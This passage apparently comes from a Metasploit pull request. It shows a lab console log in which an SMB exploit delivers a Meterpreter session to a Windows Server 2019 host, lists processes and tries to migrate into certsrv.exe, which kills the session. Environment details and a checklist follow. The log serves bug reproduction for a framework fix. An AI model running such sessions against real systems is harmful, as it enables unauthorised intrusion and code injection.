[*] 192.168.159.10:445 - Deleting \HYFGztfJ.exe...
[*] Started bind TCP handler against 192.168.159.10:8081
[*] Sending stage (255679 bytes) to 192.168.159.10
[*] Meterpreter session 1 opened (192.168.159.128:35939 -> 192.168.159.10:8081) at 2026-07-13 19:07:54 -0400

meterpreter > getpid
Current pid: 3584
meterpreter > ps

Process List
============

 PID   PPID  Name                                                                          Arch  Session  User                          Path
 ---   ----  ----                                                                          ----  -------  ----                          ----
 0     0     [System Process]
 4     0     System                                                                        x64   0
 68    684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 84    684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 104   4     Registry                                                                      x64   0
 196   4916  cmd.exe                                                                       x64   0        MSFLAB\smcintyre              C:\Windows\System32\cmd.exe
 324   4     smss.exe                                                                      x64   0
 364   1092  child-process-rb-windows-x---meterpreter-reverse-tcp20260713-1092-81co78.exe  x64   0        MSFLAB\smcintyre              C:\Users\smcintyre\AppData\Local\Temp\child-process-rb-windows-x---meterpreter-reverse-tcp20260713-1092-81co78.exe
 436   428   csrss.exe                                                                     x64   0
 532   640   LogonUI.exe                                                                   x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\LogonUI.exe
 540   428   wininit.exe                                                                   x64   0
 548   532   csrss.exe                                                                     x64   1
 640   532   winlogon.exe                                                                  x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\winlogon.exe
 684   540   services.exe                                                                  x64   0
 704   540   lsass.exe                                                                     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\lsass.exe
 724   684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 836   640   dwm.exe                                                                       x64   1        Window Manager\DWM-1          C:\Windows\System32\dwm.exe
 916   684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 936   684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 976   684   svchost.exe                                                                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1040  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1048  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1056  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1064  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1092  3300  ruby.exe                                                                      x64   0        MSFLAB\smcintyre              C:\Ruby34-x64\bin\ruby.exe
 1116  1596  cmd.exe                                                                       x64   0        MSFLAB\smcintyre              C:\Windows\System32\cmd.exe
 1136  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1148  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1156  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1168  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1200  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1236  684   svchost.exe                                                                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1348  684   svchost.exe                                                                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1412  3132  ruby.exe                                                                      x64   0        MSFLAB\smcintyre              C:\Ruby34-x64\bin\ruby.exe
 1428  684   svchost.exe                                                                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 1440  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1472  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1480  5244  conhost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\conhost.exe
 1556  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1564  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1572  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1580  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1596  196   powershell.exe                                                                x64   0        MSFLAB\smcintyre              C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
 1632  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1684  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1692  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1792  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1856  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 1960  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1984  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 1996  1748  conhost.exe                                                                   x64   0        MSFLAB\smcintyre              C:\Windows\System32\conhost.exe
 2008  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 2060  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2108  684   svchost.exe                                                                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 2196  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2268  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2324  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2400  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2764  684   spoolsv.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\spoolsv.exe
 2840  684   certsrv.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\certsrv.exe
 2856  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2864  4372  ruby.exe                                                                      x64   0        MSFLAB\smcintyre              C:\Ruby34-x64\bin\ruby.exe
 2880  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 2948  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 3080  684   svchost.exe                                                                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 3088  684   Microsoft.ActiveDirectory.WebServices.exe                                     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe
 3096  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 3132  5716  ruby.exe                                                                      x64   0        MSFLAB\smcintyre              C:\Ruby34-x64\bin\ruby.exe
 3136  684   dfsrs.exe                                                                     x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dfsrs.exe
 3144  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 3172  684   dns.exe                                                                       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dns.exe
 3260  684   inetinfo.exe                                                                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\inetsrv\inetinfo.exe
 3268  684   ismserv.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\ismserv.exe
 3288  684   MpDefenderCoreService.exe                                                     x64   0
 3300  3524  cmd.exe                                                                       x64   0        MSFLAB\smcintyre              C:\Windows\System32\cmd.exe
 3324  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 3348  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 3372  684   sqlwriter.exe                                                                 x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
 3380  684   VGAuthService.exe                                                             x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\VMware VGAuth\VGAuthService.exe
 3412  684   vmtoolsd.exe                                                                  x64   0        NT AUTHORITY\SYSTEM           C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 3420  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 3428  684   vm3dservice.exe                                                               x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vm3dservice.exe
 3436  684   sshd.exe                                                                      x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\OpenSSH\sshd.exe
 3452  684   svchost.exe                                                                   x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\svchost.exe
 3464  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 3480  684   MsMpEng.exe                                                                   x64   0
 3500  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 3524  1116  ruby.exe                                                                      x64   0        MSFLAB\smcintyre              C:\Ruby34-x64\bin\ruby.exe
 3584  1360  rundll32.exe                                                                  x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\rundll32.exe
 3604  684   dfssvc.exe                                                                    x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dfssvc.exe
 3800  3428  vm3dservice.exe                                                               x64   1        NT AUTHORITY\SYSTEM           C:\Windows\System32\vm3dservice.exe
 3888  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 4236  1092  cmd.exe                                                                       x64   0        MSFLAB\smcintyre              C:\Windows\System32\cmd.exe
 4372  4236  ruby.exe                                                                      x64   0        MSFLAB\smcintyre              C:\Ruby34-x64\bin\ruby.exe
 4476  684   vds.exe                                                                       x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\vds.exe
 4496  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 4608  1116  conhost.exe                                                                   x64   0        MSFLAB\smcintyre              C:\Windows\System32\conhost.exe
 4708  936   WmiPrvSE.exe                                                                  x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\wbem\WmiPrvSE.exe
 4776  684   dllhost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dllhost.exe
 4896  684   msdtc.exe                                                                     x64   0        NT AUTHORITY\NETWORK SERVICE  C:\Windows\System32\msdtc.exe
 4916  5244  sshd.exe                                                                      x64   0        MSFLAB\smcintyre              C:\Windows\System32\OpenSSH\sshd.exe
 5044  936   dllhost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\dllhost.exe
 5244  3436  sshd.exe                                                                      x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\OpenSSH\sshd.exe
 5368  640   fontdrvhost.exe                                                               x64   1        Font Driver Host\UMFD-1       C:\Windows\System32\fontdrvhost.exe
 5376  540   fontdrvhost.exe                                                               x64   0        Font Driver Host\UMFD-0       C:\Windows\System32\fontdrvhost.exe
 5444  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 5528  684   svchost.exe                                                                   x64   0        NT AUTHORITY\SYSTEM           C:\Windows\System32\svchost.exe
 6052  684   svchost.exe                                                                   x64   0        NT AUTHORITY\LOCAL SERVICE    C:\Windows\System32\svchost.exe
 6104  684   sqlceip.exe                                                                   x64   0        NT SERVICE\SQLTELEMETRY       C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlceip.exe
 6116  684   sqlservr.exe                                                                  x64   0        NT SERVICE\MSSQLSERVER        C:\Program Files\Microsoft SQL Server\MSSQL15.MSSQLSERVER\MSSQL\Binn\sqlservr.exe

meterpreter > migreate 2840
[-] Unknown command: migreate. Did you mean migrate? Run the help command for more details.
meterpreter > migrate 2840
[*] Migrating from 3584 to 2840...

[*] 192.168.159.10 - Meterpreter session 1 closed.  Reason: Died
```
</details>

  ## Environment

   Field                           Details
  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   Operating System                Windows Server 2019 target
  ──────────────────────────────  ────────────────────────────
   Target Software/Hardware        Windows Meterpreter
  ──────────────────────────────  ────────────────────────────
   Docker Image / Vagrant Setup    N/A

  ## AI Usage Disclosure

  AI was used to assist with reproduction analysis, root-cause investigation, patch implementation, and drafting this PR description.

  ## Pre-Submission Checklist

  - [ ] Included a corresponding documentation markdown file in documentation/modules (new modules only)
  - [ ] No sensitive information (IP addresses, credentials, API keys, hashes) in code or documentation
  - [ ] Tested on the target environment specified in the Environment section above
  - [ ] Included RSpec tests for library changes (encouraged for lib/ changes)
  - [ ] Read the CONTRIBUTING.md (https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md) and module acceptance guidelines
    (https://docs.metasploit.com/docs/development/maintainers/process/guidelines-for-accepting-modules-and-enhancements.html)